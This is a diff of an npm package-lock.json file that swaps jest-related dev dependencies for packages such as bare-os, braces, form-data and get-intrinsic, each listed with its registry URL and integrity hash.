{ + "bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", + "dev": true, + "optional": true + }, + "bare-path": { "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", "dev": true, + "optional": true, "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" + "bare-os": "^3.0.1" } }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", + "bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", "dev": true, + "optional": true, "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" + "streamx": "^2.21.0" } }, - "istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", + "braces": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", + "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", "dev": true, "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" + "fill-range": "^7.1.1" } }, - "jest": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.3.1.tgz", - "integrity": "sha512-6iWfL5DTT0Np6UYs/y5Niu7WIfNv/wRTtN5RSXt2DIEft3dx3zPuw/3WJQBCJfmEzvDiEKwoqMbGD9n49+qLSA==", - "dev": true, + "call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", "requires": { - "@jest/core": "^29.3.1", - "@jest/types": "^29.3.1", - "import-local": "^3.0.2", - "jest-cli": "^29.3.1" + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" } }, - "jest-changed-files": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.4.0.tgz", - "integrity": "sha512-rnI1oPxgFghoz32Y8eZsGJMjW54UlqT17ycQeCEktcxxwqqKdlj9afl8LNeO0Pbu+h2JQHThQP0BzS67eTRx4w==", + "chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", "dev": true, "requires": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - }, - "dependencies": { - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - } + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" } }, - "jest-circus": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.4.1.tgz", - "integrity": "sha512-v02NuL5crMNY4CGPHBEflLzl4v91NFb85a+dH9a1pUNx6Xjggrd8l9pPy4LZ1VYNRXlb+f65+7O/MSIbLir6pA==", + "color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", "dev": true, "requires": { - "@jest/environment": "^29.4.1", - "@jest/expect": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.4.1", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "dependencies": { - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - } + "color-name": "~1.1.4" } }, - "jest-cli": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.4.1.tgz", - "integrity": "sha512-jz7GDIhtxQ37M+9dlbv5K+/FVcIo1O/b1sX3cJgzlQUf/3VG25nvuWzlDC4F1FLLzUThJeWLu8I7JF9eWpuURQ==", - "dev": true, - "requires": { - "@jest/core": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.4.1.tgz", - "integrity": "sha512-g7p3q4NuXiM4hrS4XFATTkd+2z0Ml2RhFmFPM8c3WyKwVDNszbl4E7cV7WIx1YZeqqCtqbtTtZhGZWJlJqngzg==", - "dev": true, + "color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", + "dev": true + }, + "combined-stream": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", + "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.4.1", - "@jest/types": "^29.4.1", - "babel-jest": "^29.4.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.4.1", - "jest-environment-node": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-runner": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "dependencies": { - "@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - } - }, - "babel-jest": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.4.1.tgz", - "integrity": "sha512-xBZa/pLSsF/1sNpkgsiT3CmY7zV1kAsZ9OxxtrFqYucnOuRftXAfcJqcDVyOPeN4lttWTwhLdu0T9f8uvoPEUg==", - "dev": true, - "requires": { - "@jest/transform": "^29.4.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.4.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-jest-hoist": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.4.0.tgz", - "integrity": "sha512-a/sZRLQJEmsmejQ2rPEUe35nO1+C9dc9O1gplH1SXmJxveQSRUYdBk8yGZG/VOUuZs1u2aHZJusEGoRMbhhwCg==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-jest": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.4.0.tgz", - "integrity": "sha512-fUB9vZflUSM3dO/6M2TCAepTzvA4VkOvl67PjErcrQMGt9Eve7uazaeyCZ2th3UtI7ljpiBJES0F7A1vBRsLZA==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.4.0", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true - }, - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true - }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } - }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - } + "delayed-stream": "~1.0.0" } }, - "jest-docblock": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.2.0.tgz", - "integrity": "sha512-bkxUsxTgWQGbXV5IENmfiIuqZhJcyvF7tU4zJ/7ioTutdz4ToB5Yx6JOFBpgI+TphRY4lhOyCWGNH/QFQh5T6A==", + "commander": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-5.1.0.tgz", + "integrity": "sha512-P0CysNDQ7rtVw4QIQtm+MRxV66vKFSvlsQvGYXZWR3qFU0jlMKHZZZgw8e+8DSah4UDKMqnknRDQz+xuQXQ/Zg==" + }, + "debug": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", + "integrity": "sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==", "dev": true, "requires": { - "detect-newline": "^3.0.0" + "ms": "^2.1.3" } }, - "jest-each": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.4.1.tgz", - "integrity": "sha512-QlYFiX3llJMWUV0BtWht/esGEz9w+0i7BHwODKCze7YzZzizgExB9MOfiivF/vVT0GSQ8wXLhvHXh3x2fVD4QQ==", - "dev": true, + "delayed-stream": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", + "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=" + }, + "dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", "requires": { - "@jest/types": "^29.4.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.2.0", - "jest-util": "^29.4.1", - "pretty-format": "^29.4.1" - }, - "dependencies": { - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true - } + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" } }, - "jest-environment-node": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.4.1.tgz", - "integrity": "sha512-x/H2kdVgxSkxWAIlIh9MfMuBa0hZySmfsC5lCsWmWr6tZySP44ediRKDUiNggX/eHLH7Cd5ZN10Rw+XF5tXsqg==", + "end-of-stream": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", + "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", "dev": true, "requires": { - "@jest/environment": "^29.4.1", - "@jest/fake-timers": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-mock": "^29.4.1", - "jest-util": "^29.4.1" + "once": "^1.4.0" } }, - "jest-leak-detector": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.4.1.tgz", - "integrity": "sha512-akpZv7TPyGMnH2RimOCgy+hPmWZf55EyFUvymQ4LMsQP8xSPlZumCPtXGoDhFNhUE2039RApZkTQDKU79p/FiQ==", - "dev": true, + "es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==" + }, + "es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==" + }, + "es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", "requires": { - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "dependencies": { - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true - } + "es-errors": "^1.3.0" } }, - "jest-matcher-utils": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.4.1.tgz", - "integrity": "sha512-k5h0u8V4nAEy6lSACepxL/rw78FLDkBnXhZVgFneVpnJONhb2DhZj/Gv4eNe+1XqQ5IhgUcqj745UwH0HJmMnA==", - "dev": true, + "es-set-tostringtag": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.4.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "dependencies": { - "diff-sequences": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.3.1.tgz", - "integrity": "sha512-hlM3QR272NXCi4pq+N4Kok4kOp6EsgOM3ZSpJI7Da3UAs+Ttsi8MRmB6trM/lhyzUxGfOgnpkHtgqm5Q/CTcfQ==", - "dev": true - }, - "jest-diff": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.4.1.tgz", - "integrity": "sha512-uazdl2g331iY56CEyfbNA0Ut7Mn2ulAG5vUaEHXycf1L6IPyuImIxSz4F0VYBKi7LYIuxOwTZzK3wh5jHzASMw==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.3.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - } - }, - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true - } + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" } }, - "jest-message-util": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.4.1.tgz", - "integrity": "sha512-H4/I0cXUaLeCw6FM+i4AwCnOwHRgitdaUFOdm49022YD5nfyr8C/DrbXOBEyJaj+w/y0gGJ57klssOaUiLLQGQ==", + "escape-string-regexp": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", + "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", + "dev": true + }, + "fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==", + "dev": true + }, + "fill-range": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", + "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", "dev": true, "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.4.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" + "to-regex-range": "^5.0.1" } }, - "jest-mock": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.4.1.tgz", - "integrity": "sha512-MwA4hQ7zBOcgVCVnsM8TzaFLVUD/pFWTfbkY953Y81L5ret3GFRZtmPmRFAjKQSdCKoJvvqOu6Bvfpqlwwb0dQ==", - "dev": true, + "follow-redirects": { + "version": "1.15.6", + "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", + "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==" + }, + "form-data": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", + "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", "requires": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-util": "^29.4.1" + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", + "mime-types": "^2.1.12" } }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} + "function-bind": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" }, - "jest-resolve": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.4.1.tgz", - "integrity": "sha512-j/ZFNV2lm9IJ2wmlq1uYK0Y/1PiyDq9g4HEGsNTNr3viRbJdV+8Lf1SXIiLZXFvyiisu0qUyIXGBnw+OKWkJwQ==", - "dev": true, + "get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "requires": { + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" + } + }, + "get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "dependencies": { - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true - }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } - }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" } }, - "jest-resolve-dependencies": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.4.1.tgz", - "integrity": "sha512-Y3QG3M1ncAMxfjbYgtqNXC5B595zmB6e//p/qpA/58JkQXu/IpLDoLeOa8YoYfsSglBKQQzNUqtfGJJT/qLmJg==", - "dev": true, + "gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==" + }, + "graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "dev": true + }, + "has-flag": { + "version": "4.0.0", + "resolved": 